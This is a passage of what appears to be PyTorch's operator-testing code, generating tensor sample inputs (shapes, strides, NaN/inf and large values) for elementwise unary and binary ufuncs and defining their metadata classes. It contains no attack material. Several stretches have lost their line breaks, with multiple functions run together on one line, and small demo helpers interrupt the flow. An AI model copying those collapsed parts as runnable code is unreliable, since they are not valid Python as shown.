# a large 2D tensor.
def generate_elementwise_binary_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False):
    shapes = (
        # tensors with no elements
        (0,),
        (1, 0, 3),
        # zero dim (scalar) tensor
        (),
        # small 1D tensor
        (20,),
        # medium 1D tensor
        (812,),
        # large 2D tensor
        (1029, 917),
    )

    make_arg = partial(
        make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )
    for shape in shapes:
        lhs = make_arg(shape, **op.lhs_make_tensor_kwargs)
        rhs = make_arg(shape, **op.rhs_make_tensor_kwargs)
        yield SampleInput(lhs, args=(rhs,))

def generate_elementwise_binary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False, exclude_zero=False):
    # shape, strides, offset
    strided_cases = (
        ((5, 6, 2), (1, 1, 7), 2),
        ((5, 5, 4), (1, 1, 7), 2),
        ((5, 5, 2), (4, 5, 7), 3),
        ((5, 5, 2), (5, 5, 7), 3),
        ((5, 5, 2), (5, 5, 5), 3),
        ((9, 5, 2), (0, 1, 7), 3),
    )

    make_arg = partial(
        make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )
    for shape, strides, offset in strided_cases:
        a = make_arg(500,).as_strided(shape, strides, offset)
        b = make_arg(shape)
        yield SampleInput(a, args=(b,))

# Returns a generator of pairs of contiguous tensors on the requested device and with
# the requested dtype.
#
# Unlike the previous function, the values in these tensors are specified manually.
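# For intuition: the (shape, strides, offset) triples above are materialized
# with as_strided over a flat buffer, producing overlapping and broadcast-like
# layouts. A standalone sketch with illustrative values (not used by the suite):
def _demo_arbitrarily_strided_view():
    base = torch.arange(500.)
    view = base.as_strided((5, 6, 2), (1, 1, 7), 2)
    return view.is_contiguous()  # False: elements overlap in the underlying buffer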
def generate_elementwise_binary_small_value_tensors( op, *, device, dtype, requires_grad=False, exclude_zero=None ): if exclude_zero is None: if hasattr(op, "rhs_make_tensor_kwargs"): exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False) # defines interesting values _unsigned_int_vals = (0, 1, 55, 127, 128, 190, 210, 220, 254) _int_vals = (0, -1, 1, -55, 55, -127, 127, -128) _float_vals = ( 0.0, -0.001, 0.001, -0.25, 0.25, -1.0, 1.0, -math.pi / 2, math.pi / 2, -math.pi + 0.00001, math.pi - 0.00001, -math.pi, math.pi, -math.pi - 0.00001, math.pi + 0.00001, ) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_vals, _float_vals) elif dtype.is_complex: complex_vals = product(_float_vals, _float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int8, torch.int16, torch.int32, torch.int64): prod = product(_int_vals, _int_vals) elif dtype is torch.uint8: prod = product(_unsigned_int_vals, _unsigned_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) if r == 0 and exclude_zero: r_vals.append(1) else: r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_large_value_tensors( op, *, device, dtype, requires_grad=False ): _large_int_vals = (-1113, 1113, -10701, 10701) _large_float16_vals = (-501, 501, -1001.2, 1001.2, -13437.7, 13437.7) _large_float_vals = _large_float16_vals + (-4988429.2, 4988429.2, -1e20, 1e20) l_vals = [] r_vals = [] if dtype == torch.float16: prod = product(_large_float16_vals, _large_float16_vals) elif dtype.is_floating_point: prod = product(_large_float_vals, _large_float_vals) elif dtype.is_complex: complex_vals = product(_large_float_vals, _large_float_vals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) elif dtype in (torch.int16, torch.int32, torch.int64): prod = product(_large_int_vals, _large_int_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad) yield SampleInput(lhs, args=(rhs,)) def generate_elementwise_binary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): _float_extremals = (float("inf"), float("-inf"), float("nan")) l_vals = [] r_vals = [] if dtype.is_floating_point: prod = product(_float_extremals, _float_extremals) elif dtype.is_complex: complex_vals = product(_float_extremals, _float_extremals) # Note the use of list is required here or the map generator will be # emptied by the following product and it won't produce the desired cross-product complex_vals = list(map(lambda x: complex(*x), complex_vals)) prod = product(complex_vals, complex_vals) else: raise ValueError("Unsupported dtype!") for l, r in prod: l_vals.append(l) r_vals.append(r) lhs = torch.tensor(l_vals, device=device, dtype=dtype, requires_grad=requires_grad) 
    rhs = torch.tensor(r_vals, device=device, dtype=dtype, requires_grad=requires_grad)

    yield SampleInput(lhs, args=(rhs,))

    # Test case for NaN propagation
    nan = float('nan') if dtype.is_floating_point else complex(float('nan'), float('nan'))
    lhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad)
    lhs.flatten()[::3] = nan
    rhs = make_tensor((128, 128), device=device, dtype=dtype, requires_grad=requires_grad)
    rhs.flatten()[::3] = nan

    yield SampleInput(lhs, args=(rhs,))

# Returns a generator of pairs of contiguous and noncontiguous tensors that
# require broadcasting
def generate_elementwise_binary_broadcasting_tensors(
    op, *, device, dtype, requires_grad=False, exclude_zero=False
):
    shapes = (
        ((1,), ()),
        ((2,), ()),
        ((1,), (2,)),
        ((2, 1), (2,)),
        ((1, 2), (2,)),
        ((3, 2), (2,)),
        ((1, 3, 2), (2,)),
        ((1, 3, 2), (3, 2)),
        ((3, 1, 2), (3, 2)),
        ((2, 3, 2), ()),
        ((3, 1, 2), (1, 3, 2)),
    )

    make_arg = partial(
        make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )
    for shape, noncontiguous in product(shapes, [True, False]):
        shape_lhs, shape_rhs = shape
        lhs = make_arg(
            shape_lhs, noncontiguous=noncontiguous, **op.lhs_make_tensor_kwargs
        )
        rhs = make_arg(
            shape_rhs, noncontiguous=noncontiguous, **op.rhs_make_tensor_kwargs
        )

        yield SampleInput(lhs, args=(rhs,), broadcasts_input=True)

# Returns a generator of pairs of contiguous tensors and scalars
def generate_elementwise_binary_with_scalar_samples(
    op, *, device, dtype, requires_grad=False
):
    make_arg = partial(
        make_tensor, device=device, dtype=dtype, requires_grad=requires_grad
    )

    shapes = ((), (3,), (5, 3), (0, 1, 3), (1, 5))
    if op.supports_rhs_python_scalar:
        for shape in shapes:
            lhs = make_arg(shape, **op.lhs_make_tensor_kwargs)
            rhs = make_arg(shape, **op.rhs_make_tensor_kwargs)
            lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item()
            rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item()

            yield SampleInput(lhs, args=(rhs_scalar,))

            # Extends with scalar lhs
            if op.supports_one_python_scalar:
                yield SampleInput(lhs_scalar, args=(rhs,))

    if op.supports_two_python_scalars:
        lhs_scalar = make_arg((), **op.lhs_make_tensor_kwargs).item()
        rhs_scalar = make_arg((), **op.rhs_make_tensor_kwargs).item()

        yield SampleInput(lhs_scalar, args=(rhs_scalar,))

# Returns a generator of pairs of contiguous tensors and 0d tensors and scalars and type promotion
def generate_elementwise_binary_with_scalar_and_type_promotion_samples(
    op, *, device, dtype, requires_grad=False
):
    # add these samples only for logical and comparison ops, arithmetic ops are not happy about extremal scalars
    if op.name in ('eq', 'ne', 'gt', 'ge', 'lt', 'le', 'logical_and', 'logical_or', 'logical_xor'):
        make_arg = partial(
            make_tensor, device=device, dtype=dtype, requires_grad=requires_grad
        )
        shape = (23,)  # this shape is big enough to trigger vectorization, and has non-vectorized tail
        values = (float('nan'), float('inf'), -float('inf'))
        scalar_tensors = tuple(torch.tensor(val) for val in values)
        if op.supports_rhs_python_scalar:
            lhs = make_arg(shape, **op.lhs_make_tensor_kwargs)
            rhs = make_arg(shape, **op.rhs_make_tensor_kwargs)
            for scalar in values + scalar_tensors:
                yield SampleInput(lhs, args=(scalar,))
                # Extends with scalar lhs
                if op.supports_one_python_scalar:
                    yield SampleInput(scalar, args=(rhs,))
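# A quick, self-contained illustration of the tensor x python-scalar pairing
# generated above (hypothetical values; comparison ops accept extremal scalars):
def _demo_scalar_rhs_comparison():
    t = torch.ones(23)
    return torch.eq(t, float('inf'))  # all-False boolean tensor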
# Returns a generator of pairs of noncontiguous tensors
def generate_elementwise_binary_noncontiguous_tensors(
    op, *, device, dtype, requires_grad=False, exclude_zero=False
):
    make_arg = partial(
        make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )

    # Generic noncontiguity
    lhs = make_arg((1026,), noncontiguous=True, **op.lhs_make_tensor_kwargs)
    rhs = make_arg((1026,), noncontiguous=True, **op.rhs_make_tensor_kwargs)

    yield SampleInput(lhs.clone(), args=(rhs.clone(),))
    yield SampleInput(lhs.contiguous(), args=(rhs,))

    # Transposed
    lhs = make_arg((789, 357), **op.lhs_make_tensor_kwargs)
    rhs = make_arg((789, 357), **op.rhs_make_tensor_kwargs)

    yield SampleInput(lhs.T, args=(rhs.T,))

    # More noncontiguity
    shapes = ((5, 7), (1024,))
    for shape in shapes:
        lhs = make_arg(shape, **op.lhs_make_tensor_kwargs)
        rhs = make_arg(shape, **op.rhs_make_tensor_kwargs)

        lhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0]
        lhs_non_contig.copy_(lhs)

        rhs_non_contig = torch.empty(shape + (2,), device=device, dtype=dtype)[..., 0]
        rhs_non_contig.copy_(rhs)

        yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),))
        yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,))

    # Noncontiguous indices
    shape = (2, 2, 1, 2)
    lhs = make_arg(shape, **op.lhs_make_tensor_kwargs)
    rhs = make_arg(shape, **op.rhs_make_tensor_kwargs)

    lhs_non_contig = lhs[:, 1, ...]
    rhs_non_contig = rhs[:, 1, ...]

    yield SampleInput(lhs_non_contig.clone(), args=(rhs_non_contig.clone(),))
    yield SampleInput(lhs_non_contig.contiguous(), args=(rhs_non_contig,))

    # Expanded tensors
    shapes = ((1, 3), (1, 7), (5, 7))
    for shape in shapes:
        lhs = make_arg(shape, **op.lhs_make_tensor_kwargs)
        rhs = make_arg(shape, **op.rhs_make_tensor_kwargs)

        lhs_non_contig = lhs.expand(3, -1, -1)
        rhs_non_contig = rhs.expand(3, -1, -1)

        yield SampleInput(lhs_non_contig, args=(rhs_non_contig,))

# Sample inputs for elementwise binary operators, like add
def sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs):
    exclude_zero = False
    if hasattr(op, "rhs_make_tensor_kwargs"):
        exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False)

    make_arg = partial(
        make_tensor, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )

    shapes = (
        ((), ()),
        ((S,), ()),
        ((S, 1), (S,)),
        ((M, S), ()),
        ((S, M, S), (M, S)),
        ((S, M, S), (S, M, S)),
        ((M, 1, S), (M, S)),
        ((M, 1, S), (1, M, S)),
        ((0, 1, 3), (0, 10, 3)),
    )

    sample_kwargs = kwargs.get("sample_kwargs", {})

    for shape_lhs, shape_rhs in shapes:
        lhs = make_arg(shape_lhs, **op.lhs_make_tensor_kwargs)
        rhs = make_arg(shape_rhs, **op.rhs_make_tensor_kwargs)
        broadcasts_input = shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs)

        yield SampleInput(
            lhs, args=(rhs,), kwargs=sample_kwargs, broadcasts_input=broadcasts_input
        )

def sample_inputs_jiterator(op, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad)

    shapes = (
        ((), ()),
        ((S,), ()),
        ((S, 1), (S,)),
        ((M, S), ()),
        ((S, M, S), (M, S)),
        ((S, M, S), (S, M, S)),
        ((M, 1, S), (M, S)),
        ((M, 1, S), (1, M, S)),
        ((0, 1, 3), (0, 10, 3))
    )

    num_inputs = kwargs.get('num_inputs')
    sample_kwargs = kwargs.get('sample_kwargs', {})

    for shape_lhs, shape_rhs in shapes:
        lhs = make_arg(shape_lhs)

        args = []
        for i in range(num_inputs - 1):
            args.append(make_arg(shape_rhs))

        broadcasts_input = (shape_lhs != torch.broadcast_shapes(shape_lhs, shape_rhs))

        yield SampleInput(lhs, args=tuple(args), kwargs=sample_kwargs, broadcasts_input=broadcasts_input)
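# The broadcasts_input flag computed above compares the lhs shape against
# torch.broadcast_shapes; a standalone sketch with arbitrary example shapes:
def _demo_broadcasts_input_flag():
    shape_lhs, shape_rhs = (S, 1), (S,)
    out_shape = torch.broadcast_shapes(shape_lhs, shape_rhs)  # (S, S)
    return shape_lhs != out_shape  # True: the op broadcasts its first input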
def sample_inputs_broadcast_shapes(op, device, dtype, requires_grad, **kwargs):
    shapes = (
        ((), ()),
        ((S,), ()),
        ((S, 1), (S,)),
        ((S, 1), S),
        ((M, S), ()),
        ((S, M, S), (M, S)),
        ((S, M, S), (S, M, S)),
        ((M, 1, S), (M, S)),
        ((M, 1, S), (1, M, S)),
        ((0, 1, 3), (0, 10, 3))
    )

    for shape in shapes:
        inp, *arg0 = shape
        yield SampleInput(inp, args=arg0)

# The base reference input generation for elementwise binary operations
def _reference_inputs_elementwise_binary(op, device, dtype, requires_grad, exclude_zero, **kwargs):
    yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs)
    yield from generate_elementwise_binary_tensors(
        op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )
    if dtype is not torch.bool:
        yield from generate_elementwise_binary_small_value_tensors(
            op, device=device, dtype=dtype, requires_grad=requires_grad
        )
    if dtype not in (torch.bool, torch.uint8, torch.int8):
        yield from generate_elementwise_binary_large_value_tensors(
            op, device=device, dtype=dtype, requires_grad=requires_grad
        )
    # TODO: FIXME: RuntimeError: "index_select" not implemented for 'ComplexHalf'
    if dtype not in (torch.chalf,):
        yield from generate_elementwise_binary_broadcasting_tensors(
            op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
        )
    yield from generate_elementwise_binary_with_scalar_samples(
        op, device=device, dtype=dtype, requires_grad=requires_grad
    )
    yield from generate_elementwise_binary_with_scalar_and_type_promotion_samples(
        op, device=device, dtype=dtype, requires_grad=requires_grad
    )

    if dtype.is_floating_point or dtype.is_complex:
        yield from generate_elementwise_binary_extremal_value_tensors(
            op, device=device, dtype=dtype, requires_grad=requires_grad
        )

# Note that these reference inputs use scalars for the SampleInput.input value,
# and many tests require SampleInput.input be a tensor or a list of tensors
def reference_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs):
    exclude_zero = False
    if hasattr(op, "rhs_make_tensor_kwargs"):
        exclude_zero = op.rhs_make_tensor_kwargs.get("exclude_zero", False)

    gen = partial(
        _reference_inputs_elementwise_binary, op, device, dtype, requires_grad, exclude_zero, **kwargs
    )

    # yields "normal" samples
    yield from gen()

    # TODO: RuntimeError: "index_select" not implemented for 'ComplexHalf'
    if dtype is torch.chalf:
        return

    # yields noncontiguous samples
    for sample in gen():
        yield sample.noncontiguous()

    yield from generate_elementwise_binary_noncontiguous_tensors(
        op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )

    yield from generate_elementwise_binary_arbitrarily_strided_tensors(
        op, device=device, dtype=dtype, requires_grad=requires_grad, exclude_zero=exclude_zero
    )

# A functional that extends an elementwise binary operator's bespoke error inputs
# with generic error inputs for the class of elementwise binary operations
def make_error_inputs_elementwise_binary(error_inputs_func):
    def error_inputs_func_wrapper(op, device, **kwargs):
        if error_inputs_func is not None:
            yield from error_inputs_func(op, device, **kwargs)

        if not op.supports_rhs_python_scalar:
            si = SampleInput(torch.tensor((1, 2, 3), device=device), args=(2,))
            yield ErrorInput(si, error_type=Exception, error_regex="")

        if not op.supports_one_python_scalar:
            si = SampleInput(2, args=(torch.tensor((1, 2, 3), device=device),))
            yield ErrorInput(si, error_type=Exception, error_regex="")

        if (
            not kwargs.get("skip_two_python_scalars", False)
            and not op.supports_two_python_scalars
        ):
            si = SampleInput(2, args=(3,))
            yield ErrorInput(si, error_type=Exception, error_regex="")

    return error_inputs_func_wrapper

# Metadata class for binary "universal functions (ufuncs)" that accept two
# tensor and
have common properties class BinaryUfuncInfo(OpInfo): """Operator information for 'universal binary functions (binary ufuncs).' These are functions of two tensors with common properties like: - they are elementwise functions - the output shape is determined by the input shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/stable/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, *, sample_inputs_func=sample_inputs_elementwise_binary, reference_inputs_func=reference_inputs_elementwise_binary, error_inputs_func=None, lhs_make_tensor_kwargs=None, rhs_make_tensor_kwargs=None, promotes_int_to_float=False, # Set to true if the op promotes integer inputs to float always_returns_bool=False, # Set to true if the op always returns bool tensors supports_rhs_python_scalar=True, # Whether the operator allows Tensor x scalar inputs supports_one_python_scalar=False, # Whether the operator allows scalar x tensor and tensor x scalar inputs supports_two_python_scalars=False, # Whether the operator allows scalar x scalar inputs **kwargs, ): self._original_binary_ufunc_args = locals().copy() # Elementwise binary operations perform the equivalent of test_numpy_refs # in test_binary_ufuncs, but with additional test granularity. So the # generic test_ops.py test is skipped because it's redundant. common_skips = ( DecorateInfo( unittest.skip("Skipping redundant test."), "TestCommon", "test_numpy_refs", ), ) kwargs["skips"] = kwargs.get("skips", tuple()) + common_skips super(BinaryUfuncInfo, self).__init__( name, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, error_inputs_func=make_error_inputs_elementwise_binary(error_inputs_func), **kwargs, ) # [lr]hs_make_tensor_kwargs are part of the OpInfo to be able to dynamically generate valid samples later on. if lhs_make_tensor_kwargs is None: lhs_make_tensor_kwargs = {} self.lhs_make_tensor_kwargs = lhs_make_tensor_kwargs if rhs_make_tensor_kwargs is None: rhs_make_tensor_kwargs = {} self.rhs_make_tensor_kwargs = rhs_make_tensor_kwargs self.promotes_int_to_float = promotes_int_to_float self.always_returns_bool = always_returns_bool self.supports_rhs_python_scalar = supports_rhs_python_scalar self.supports_one_python_scalar = supports_one_python_scalar self.supports_two_python_scalars = supports_two_python_scalars if self.supports_two_python_scalars: self.supports_one_python_scalar = True if self.supports_one_python_scalar: assert ( supports_rhs_python_scalar ), "Can't support lhs and rhs Python scalars but not rhs scalars!" # The following functions and classes are for testing elementwise unary operators. 
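# How the domain convention used below works in practice: sample values are
# drawn from [low + eps, high - eps] so gradcheck never probes a boundary point.
# A schematic, self-contained example with made-up numbers (a sqrt-like domain):
def _demo_domain_clipped_sample():
    low, high = 0.0, None  # e.g. a [0, inf) domain
    eps = 1e-5             # mirrors the _domain_eps epsilon defined below
    return make_tensor((3,), device='cpu', dtype=torch.float64, low=low + eps, high=high)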
def sample_inputs_elementwise_unary(
    op_info, device, dtype, requires_grad, op_kwargs=None, **kwargs
):
    if not op_kwargs:
        op_kwargs = {}

    low, high = op_info.domain
    low = low if low is None else low + op_info._domain_eps
    high = high if high is None else high - op_info._domain_eps
    if op_info.supports_sparse_csr:
        # Tensors with dim=2 for sparse CSR testing
        yield SampleInput(
            make_tensor(
                (L, L),
                device=device,
                dtype=dtype,
                low=low,
                high=high,
                requires_grad=requires_grad,
            ),
            kwargs=op_kwargs,
        )
    else:
        # Creates a 1D, empty, and scalar tensor
        for shape in ((L,), (1, 0, 3), ()):
            yield SampleInput(
                make_tensor(
                    shape,
                    device=device,
                    dtype=dtype,
                    low=low,
                    high=high,
                    requires_grad=requires_grad,
                ),
                kwargs=op_kwargs,
            )

# Replace values satisfying condition with a safe value. This is used to block
# out values that could cause singularity like tan(pi/2)
def _replace_values_in_tensor(tensor, condition, safe_value):
    mask = condition(tensor)
    tensor.masked_fill_(mask, safe_value)

# Helper to create a unary elementwise tensor with valid inputs
def _make_unary_elementwise_tensor(shape, *, op, dtype, **kwargs):
    low, high = op.domain
    low = low if low is None else low + op._domain_eps
    high = high if high is None else high - op._domain_eps

    a = make_tensor(shape, low=low, high=high, dtype=dtype, **kwargs)

    if op.reference_numerics_filter is not None and dtype is not torch.bool:
        condition, safe_value = op.reference_numerics_filter
        _replace_values_in_tensor(a, condition, safe_value)

    return a

# Restricts the values in the tensor to the domain of the
# given elementwise unary operator
def _filter_unary_elementwise_tensor(a, *, op):
    # short-circuits for boolean tensors
    if a.dtype is torch.bool:
        return a

    low, high = op.domain
    low = low if low is None else low + op._domain_eps
    high = high if high is None else high - op._domain_eps

    if a.dtype is torch.uint8 and low is not None:
        low = max(low, 0)

    if not a.dtype.is_floating_point and not a.dtype.is_complex:
        low = math.ceil(low) if low is not None else None
        high = math.floor(high) if high is not None else None

    if op.reference_numerics_filter is not None:
        condition, safe_value = op.reference_numerics_filter
        _replace_values_in_tensor(a, condition, safe_value)

    if low is not None or high is not None:
        if a.dtype.is_complex:
            a.real.clamp_(low, high)
            a.imag.clamp_(low, high)
        else:
            a.clamp_(min=low, max=high)

    return a

def generate_elementwise_unary_tensors(op, *, device, dtype, requires_grad, **kwargs):
    # Special-cases bool
    if dtype is torch.bool:
        tensors = (
            torch.empty(0, device=device, dtype=torch.bool),
            torch.tensor(True, device=device),
            torch.tensor(False, device=device),
            torch.tensor((True, False), device=device),
            make_tensor((812,), device=device, dtype=dtype),
            make_tensor((1029, 917), device=device, dtype=dtype),
        )
        for a in tensors:
            yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0])

    shapes = (
        (1029, 917),
        (812,),
        # Empty sizes
        (0,),
        (0, 3, 3),
        (1, 0, 5),
        (6, 0, 0, 0),
        (3, 0, 1, 0),
    )

    make_arg = partial(
        _make_unary_elementwise_tensor,
        op=op,
        device=device,
        dtype=dtype,
        requires_grad=requires_grad,
    )
    for shape in shapes:
        a = make_arg(shape)
        yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0])

def generate_elementwise_unary_small_value_tensors(
    op, *, device, dtype, requires_grad=False
):
    for sample in generate_elementwise_binary_small_value_tensors(
        op, device=device, dtype=dtype, requires_grad=requires_grad
    ):
        a = _filter_unary_elementwise_tensor(sample.input, op=op)
        yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0])

def
generate_elementwise_unary_large_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): a = _filter_unary_elementwise_tensor(sample.input, op=op) yield SampleInput(sample.input, kwargs=op.sample_kwargs(device, dtype, a)[0]) def generate_elementwise_unary_extremal_value_tensors( op, *, device, dtype, requires_grad=False ): for sample in generate_elementwise_binary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad ): yield SampleInput( sample.input, kwargs=op.sample_kwargs(device, dtype, sample.input)[0] ) def generate_elementwise_unary_noncontiguous_tensors( op, *, device, dtype, requires_grad=False ): low, high = op.domain low = low if low is None else low + op._domain_eps high = high if high is None else high - op._domain_eps make_arg = partial( _make_unary_elementwise_tensor, op=op, device=device, dtype=dtype, requires_grad=requires_grad, ) # Generic noncontiguity t = make_arg((1026,), noncontiguous=True) yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Transposed t = make_arg((1024, 1024)).T yield SampleInput(t, kwargs=op.sample_kwargs(device, dtype, t)[0]) # Expanded tensors shapes = ((1, 3), (1, 7), (5, 7)) for shape in shapes: t = make_arg(shape) t_non_contig = t.expand(3, -1, -1) yield SampleInput( t_non_contig, kwargs=op.sample_kwargs(device, dtype, t_non_contig)[0] ) def generate_elementwise_unary_arbitrarily_strided_tensors(op, *, device, dtype, requires_grad=False): # shape, strides, offset strided_cases = ( ((5, 6, 2), (1, 1, 7), 2), ((5, 5, 4), (1, 1, 7), 2), ((5, 5, 2), (4, 5, 7), 3), ((5, 5, 2), (5, 5, 7), 3), ((5, 5, 2), (5, 5, 5), 3), ((9, 5, 2), (0, 1, 7), 3), ) make_arg = partial( make_tensor, device=device, dtype=dtype, requires_grad=requires_grad ) for shape, strides, offset in strided_cases: a = make_arg(500,).as_strided(shape, strides, offset) yield SampleInput(a, kwargs=op.sample_kwargs(device, dtype, a)[0]) # Reuses the elementwise binary generators for consistency # TODO: in the future generalize the reference generators to handle n-ary elementwise operations def _reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): yield from op.sample_inputs_func(op, device, dtype, requires_grad, **kwargs) yield from generate_elementwise_unary_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype is not torch.bool: yield from generate_elementwise_unary_small_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype not in (torch.bool, torch.uint8, torch.int8) and ( op.handles_large_floats or (not dtype.is_floating_point and not dtype.is_complex) ): yield from generate_elementwise_unary_large_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) if dtype.is_floating_point or (op.handles_complex_extremal_values and dtype.is_complex): yield from generate_elementwise_unary_extremal_value_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) def reference_inputs_elementwise_unary(op, device, dtype, requires_grad, **kwargs): gen = partial( _reference_inputs_elementwise_unary, op, device, dtype, requires_grad, **kwargs ) # yields "normal" samples yield from gen() # yields noncontiguous samples for sample in gen(): yield sample.noncontiguous() yield from generate_elementwise_unary_noncontiguous_tensors( op, device=device, dtype=dtype, 
requires_grad=requires_grad, **kwargs ) yield from generate_elementwise_unary_arbitrarily_strided_tensors( op, device=device, dtype=dtype, requires_grad=requires_grad, **kwargs ) # Metadata class for unary "universal functions (ufuncs)" that accept a single # tensor and have common properties like: class UnaryUfuncInfo(OpInfo): """Operator information for 'universal unary functions (unary ufuncs).' These are functions of a single tensor with common properties like: - they are elementwise functions - the input shape is the output shape - they typically have method and inplace variants - they typically support the out kwarg - they typically have NumPy or SciPy references See NumPy's universal function documentation (https://numpy.org/doc/1.18/reference/ufuncs.html) for more details about the concept of ufuncs. """ def __init__( self, name, # the string name of the function *, ref, # a reference function dtypes=floating_types(), dtypesIfCUDA=None, dtypesIfROCM=None, domain=(None, None), # the [low, high) domain of the function handles_complex_extremal_values=True, # whether the op correctly handles extremal values (like nan/inf) handles_large_floats=True, # whether the op correctly handles large float values (like 1e20) supports_complex_to_float=False, # op supports casting from complex input to real output safely eg. angle sample_inputs_func=sample_inputs_elementwise_unary, reference_inputs_func=reference_inputs_elementwise_unary, sample_kwargs=lambda device, dtype, input: ({}, {}), supports_sparse=False, reference_numerics_filter=None, # Filters values in the range of the domain specified above but that should not be tested **kwargs, ): self._original_unary_ufunc_args = locals().copy() super(UnaryUfuncInfo, self).__init__( name, dtypes=dtypes, dtypesIfCUDA=dtypesIfCUDA, dtypesIfROCM=dtypesIfROCM, sample_inputs_func=sample_inputs_func, reference_inputs_func=reference_inputs_func, supports_sparse=supports_sparse, **kwargs, ) self.ref = ref self.domain = domain self.handles_complex_extremal_values = handles_complex_extremal_values self.handles_large_floats = handles_large_floats self.supports_complex_to_float = supports_complex_to_float self.reference_numerics_filter = reference_numerics_filter # test_unary_ufuncs.py generates its own inputs to test the consistency # of the operator on sliced tensors, non-contig tensors, etc. # `sample_kwargs` is a utility function to provide kwargs # along with those inputs if required (eg. clamp). # It should return two dictionaries, first holding kwarg for # torch operator and second one for reference NumPy operator. self.sample_kwargs = sample_kwargs # Epsilon to ensure grad and gradgrad checks don't test values # outside a function's domain. 
self._domain_eps = 1e-5 def sample_inputs_add_sub(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds alpha kwarg cases make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': 2}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': True}) neg_alpha = -3.14 if (dtype.is_floating_point or dtype.is_complex) else -3 lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) if dtype is not torch.bool: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': neg_alpha}) else: yield SampleInput(lhs, args=(rhs,), kwargs={'alpha': False}) def sample_inputs_isclose(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Creates additional inputs to test the rtol, atol, and equal_nan params rtols = [0., 1e-7] atols = [0., 1e-7] equal_nans = [False, True] products = product(rtols, atols, equal_nans) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) for rtol, atol, equal_nan in products: lhs = make_arg((S, S), **op.lhs_make_tensor_kwargs) rhs = make_arg((S, S), **op.rhs_make_tensor_kwargs) yield SampleInput(lhs, args=(rhs,), kwargs=dict(rtol=rtol, atol=atol, equal_nan=equal_nan)) def sample_inputs_t(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) return (SampleInput(make_arg((1, 2))), SampleInput(make_arg((2,))), SampleInput(make_arg(()))) def sample_inputs_mm(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, 